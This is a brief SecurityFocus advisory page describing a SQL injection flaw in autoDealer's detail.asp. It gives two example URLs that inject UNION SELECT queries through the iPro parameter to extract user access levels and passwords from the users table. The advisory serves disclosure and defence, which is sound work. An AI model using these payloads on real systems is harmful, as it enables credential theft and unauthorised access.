autoDealer Detail.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following examples are available to demonstrate this issue:

http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users


 

Privacy Statement
Copyright 2010, SecurityFocus